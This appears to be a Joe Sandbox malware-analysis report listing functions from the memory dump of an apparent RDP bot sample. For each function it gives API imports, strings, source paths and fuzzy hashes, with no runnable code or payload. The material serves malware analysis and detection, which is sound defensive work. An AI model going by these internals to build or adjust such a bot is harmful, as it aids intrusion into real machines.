Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen
String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
API String ID: 39653677-892027187
Opcode ID: a013a8a5a94643a489f30f4012283d97676f0be25172f8c4c2e0530956782a92
Instruction ID: c3dde3739b9240d407ee48a7e0fc7c6b79a0b6261a2840084d8029fc60403841
Opcode Fuzzy Hash: a013a8a5a94643a489f30f4012283d97676f0be25172f8c4c2e0530956782a92
Instruction Fuzzy Hash: 26510159F0A793B5FA25BA16A9167B596727F12788FC404B2D94E0B3D0DF2CE901A320

Function 00007FF73AFB6C99 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB6D12
strlen.MSVCRT ref: 00007FF73AFB6D2E
strcat.MSVCRT ref: 00007FF73AFB6D3D
strlen.MSVCRT ref: 00007FF73AFB6D48

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB6CE7
fs_module_file, xrefs: 00007FF73AFB6CF5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB6CFC
(file_path != NULL), xrefs: 00007FF73AFB6CEE

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-2423714266
Opcode ID: 83d82f4d3edec64fe81c16d1b10e2db1f34f9444059a02a730a7ec5d1454eb3f
Instruction ID: c5237a0ce71fc9e5a1c53a4af004436db0d111e57cff8c8bbd377001e207fa51
Opcode Fuzzy Hash: 83d82f4d3edec64fe81c16d1b10e2db1f34f9444059a02a730a7ec5d1454eb3f
Instruction Fuzzy Hash: B911D369B08B4365FE55BF1698167F5E6A15F15784FCC48B0DE8E0B382EE3CD401A360

Function 00007FF73AFBCACD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98stringCOMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF73AFBCB20
fwprintf.MSVCRT ref: 00007FF73AFBCB34
strlen.MSVCRT ref: 00007FF73AFBCB9A

Strings

%.*S, xrefs: 00007FF73AFBCB2D
%-*.*S, xrefs: 00007FF73AFBCB19
%*.*S, xrefs: 00007FF73AFBCB10

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fwprintf$strlen
String ID: %*.*S$%-*.*S$%.*S
API String ID: 2636243462-2115465065
Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction ID: 535268d9f6497099e751951f5dac209ecc796e4ced873b9fbd01e02333e58d1b
Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
Instruction Fuzzy Hash: 7631D86AF1834396F750BF17980A57EE2A0EB48B94F84C1B1DD5D8B785DE3CE402A720

Function 00007FF73AFB385C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AFB1CF4: LoadLibraryA.KERNEL32 ref: 00007FF73AFB1D02

GetLastError.KERNEL32 ref: 00007FF73AFB38D8

Part of subcall function 00007FF73AFB1C73: GetProcAddress.KERNEL32 ref: 00007FF73AFB1C93

Strings

fs_wow_redir_revert, xrefs: 00007FF73AFB38BB, 00007FF73AFB38E1
[I] (%s) -> %s, xrefs: 00007FF73AFB38C2
Done, xrefs: 00007FF73AFB38B4
Wow64RevertWow64FsRedirection, xrefs: 00007FF73AFB387D
[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu), xrefs: 00007FF73AFB38E8
kernel32, xrefs: 00007FF73AFB3869

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProc
String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
API String ID: 3511525774-1584720945
Opcode ID: 29032d2e412322b7012e75e3eb2c96c128202e635fb7dffd687a4305b13bbcd5
Instruction ID: d1bf49dbec15c3fe6b1176242aec8c5e72d5f3ec97223e9db0ff16e832794388
Opcode Fuzzy Hash: 29032d2e412322b7012e75e3eb2c96c128202e635fb7dffd687a4305b13bbcd5
Instruction Fuzzy Hash: 7A11E56DF0CB43B1FB14B716A8833F4E261AF10344FD00AB5D49E466A1EEACE548E721

Function 00007FF73AFB37C0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AFB1CF4: LoadLibraryA.KERNEL32 ref: 00007FF73AFB1D02

Part of subcall function 00007FF73AFB1C73: GetProcAddress.KERNEL32 ref: 00007FF73AFB1C93

GetLastError.KERNEL32 ref: 00007FF73AFB3820

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Strings

[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu), xrefs: 00007FF73AFB3830
[I] (%s) -> %s, xrefs: 00007FF73AFB380A
Done, xrefs: 00007FF73AFB37FC
fs_wow_redir_disable, xrefs: 00007FF73AFB3803, 00007FF73AFB3829
Wow64DisableWow64FsRedirection, xrefs: 00007FF73AFB37D8
kernel32, xrefs: 00007FF73AFB37C4

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadProcfflushfwrite
String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
API String ID: 1533789296-1853374401
Opcode ID: 080ad7bc366025a3089ec555cad0c89bfd8f82290c6afcc84d692de1d3857fa3
Instruction ID: 3b3d61b38be63bc5ab8b97ab79db38a116f0b2e1b975810f2bae5c3e6909e836
Opcode Fuzzy Hash: 080ad7bc366025a3089ec555cad0c89bfd8f82290c6afcc84d692de1d3857fa3
Instruction Fuzzy Hash: 5701D76DE08A43B1FB11BB16A8823F4D260AF04344FD00AB5C09E466A1EF6DE949F721

Function 00007FF73AFB33C0 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF73AFB33D8
CloseHandle.KERNEL32 ref: 00007FF73AFB33DE

Strings

(pi != NULL), xrefs: 00007FF73AFB33FB
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB33F4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB3409
process_free, xrefs: 00007FF73AFB3402

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CloseHandle
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
API String ID: 2962429428-1801624891
Opcode ID: 12a4ad33b94f59e2d35f31c4cd6cc09bd18029f5dc8a1f5724eea2af5869da8b
Instruction ID: c62c82afc3c86d21a0e44b57ac613c8a2ffef86068263febcef14c3ee91a52ab
Opcode Fuzzy Hash: 12a4ad33b94f59e2d35f31c4cd6cc09bd18029f5dc8a1f5724eea2af5869da8b
Instruction Fuzzy Hash: DFF08269A0855BA0FA14FB12EC121B99320FF44344FC80972D94D47664DE3CD942E320

Function 00007FF73AFB7E04 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32 ref: 00007FF73AFB7E82
GetLastError.KERNEL32 ref: 00007FF73AFB7E90

Strings

%S%S, xrefs: 00007FF73AFB7F88
[E] (%s) -> QueryDosDeviceW failed(gle=%lu), xrefs: 00007FF73AFB7EA2
path_convert_to_nt, xrefs: 00007FF73AFB7E9B

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: DeviceErrorLastQuery
String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
API String ID: 963133057-3473575966
Opcode ID: c996426b9d41c6d35987dbf9260498d4bde78d65dd98a9a6a52ba82241d016f5
Instruction ID: cff11cd2b79d9e0327aa3f69e7b4503414fba9479a3fff4ef3db834ef3d56c12
Opcode Fuzzy Hash: c996426b9d41c6d35987dbf9260498d4bde78d65dd98a9a6a52ba82241d016f5
Instruction Fuzzy Hash: 3341921AE0E757A2FB30761494523B9D2719F42794F9500B2DD8E1B7C5DE2CEC80B3A1

Function 00007FF73AFBCCD9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF73AFBCD2A

Strings

%.*s, xrefs: 00007FF73AFBCD37
%S%S, xrefs: 00007FF73AFBCCDB
%*.*s, xrefs: 00007FF73AFBCD1A
%-*.*s, xrefs: 00007FF73AFBCD23

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fwprintf
String ID: %*.*s$%-*.*s$%.*s$%S%S
API String ID: 968622242-2451587232
Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction ID: 2f805ae0542b1e1a53399df9f1a8c1f0ed83530d8c49ab0a4a60a7a8367b90d2
Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
Instruction Fuzzy Hash: 2531DC7EF0870355F7606A26880A57AEBA0EF4CB94F84C171DA5D8B684DE2CE412A720

Function 00007FF73AFB193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB1956
DeleteCriticalSection.KERNEL32 ref: 00007FF73AFB1983

Strings

Done, xrefs: 00007FF73AFB1994
debug_cleanup, xrefs: 00007FF73AFB199B
[I] (%s) -> %s, xrefs: 00007FF73AFB19A2

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: CriticalDeleteSectionfclose
String ID: Done$[I] (%s) -> %s$debug_cleanup
API String ID: 3387974148-4247581856
Opcode ID: 6caffc1d6df5e181b95bedd39bed0003f3bec221b2616f58556cd0866e05cbfa
Instruction ID: b3fcfd42d309c4abe89e714f6bd70eb3eaa5ee41c0b8584bf5e10702f9952906
Opcode Fuzzy Hash: 6caffc1d6df5e181b95bedd39bed0003f3bec221b2616f58556cd0866e05cbfa
Instruction Fuzzy Hash: 88F0E22CA49643B8FB08BB52E85B371A361AF40344FC41AB5C08E462A1CF7DF049E760

Function 00007FF73AFBA96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00007FF73AFCA1E8,00000000,?,?,?,00007FF73AFCA1E0,00007FF73AFB1208,?,?,?,00007FF73AFB1313), ref: 00007FF73AFBABC2

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF73AFBAA62
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF73AFBAB5D
Unknown pseudo relocation bit size %d., xrefs: 00007FF73AFBAAEB

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction ID: 13a24f1c4f14e01848188d749e117911b19c0c512aadfa91463bc4283afed161
Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
Instruction Fuzzy Hash: CA61AF29F08743E6FB20BB16D5422B8ABB5AB44B94F8482B1C91D437D5DE3CE581E720

Function 00007FF73AFB19C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetModuleHandleExA.KERNEL32 ref: 00007FF73AFB19DE
GetLastError.KERNEL32 ref: 00007FF73AFB19FB

Strings

module_current, xrefs: 00007FF73AFB1A04
[E] (%s) -> GetModuleHandleExA failed(gle=%lu), xrefs: 00007FF73AFB1A0B

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
API String ID: 4242514867-2427012484
Opcode ID: 5d5017756388f0c44f81d69e3be0139bb16f70aafb5da82e5f439a8c0ba099b7
Instruction ID: 67ae60e9bc63c75b81b89746f9d48b30b06ef04c2e860c71455f1c2cb6056fe5
Opcode Fuzzy Hash: 5d5017756388f0c44f81d69e3be0139bb16f70aafb5da82e5f439a8c0ba099b7
Instruction Fuzzy Hash: 52F0302DA08743A0F720BB55E4423AAA770EB44398FD40571C58E036B4CE3CD149E724

Function 00007FF73AFC0150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF73AFC01CB
IsDBCSLeadByteEx.KERNEL32 ref: 00007FF73AFC01E6
MultiByteToWideChar.KERNEL32 ref: 00007FF73AFC023A
_errno.MSVCRT ref: 00007FF73AFC0244

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Byte$CharMultiWide$Lead_errno
String ID:
API String ID: 2766522060-0
Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction ID: 06a72a5064c4eb3aa6cf0ab95af39bd40749348e3f9f76a23fe9be256fcb9bb5
Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
Instruction Fuzzy Hash: B7310A7AA0C2835BF7306F22D4413B9EA90AB85788F844575EACC437C5DF3DD446AB20

Function 00007FF73AFBAC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF73AFBACE6
signal.MSVCRT ref: 00007FF73AFBACFB

Strings

CCG , xrefs: 00007FF73AFBAC46

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction ID: fac8c024003df146176ce8d6e06926f9d09b35457081833f93c77655471f53cc
Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
Instruction Fuzzy Hash: F521A3A9E0D70767FA747215944337C99A19F48321FA88BB6C98D833D5DE1CF8817231

Function 00007FF73AFBA6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D
Unknown error, xrefs: 00007FF73AFBA6E7

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction ID: 70f171ee1d090ba955fc0c9fdceb7dd88a966cc864832e65e15eac138d967d42
Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
Instruction Fuzzy Hash: ED115166808F8592E6119F1CE0423EAF370FF9A359FA05726EBC816224DF3DD1528700

Function 00007FF73AFBA722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF73AFBA78A

Strings

Total loss of significance (TLOSS), xrefs: 00007FF73AFBA722
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF73AFBA77D

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
Instruction ID: cf739dbd4b7ec709176ad720ea2c2a55708cd003a242f2be01a83bdaac4171fa
Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
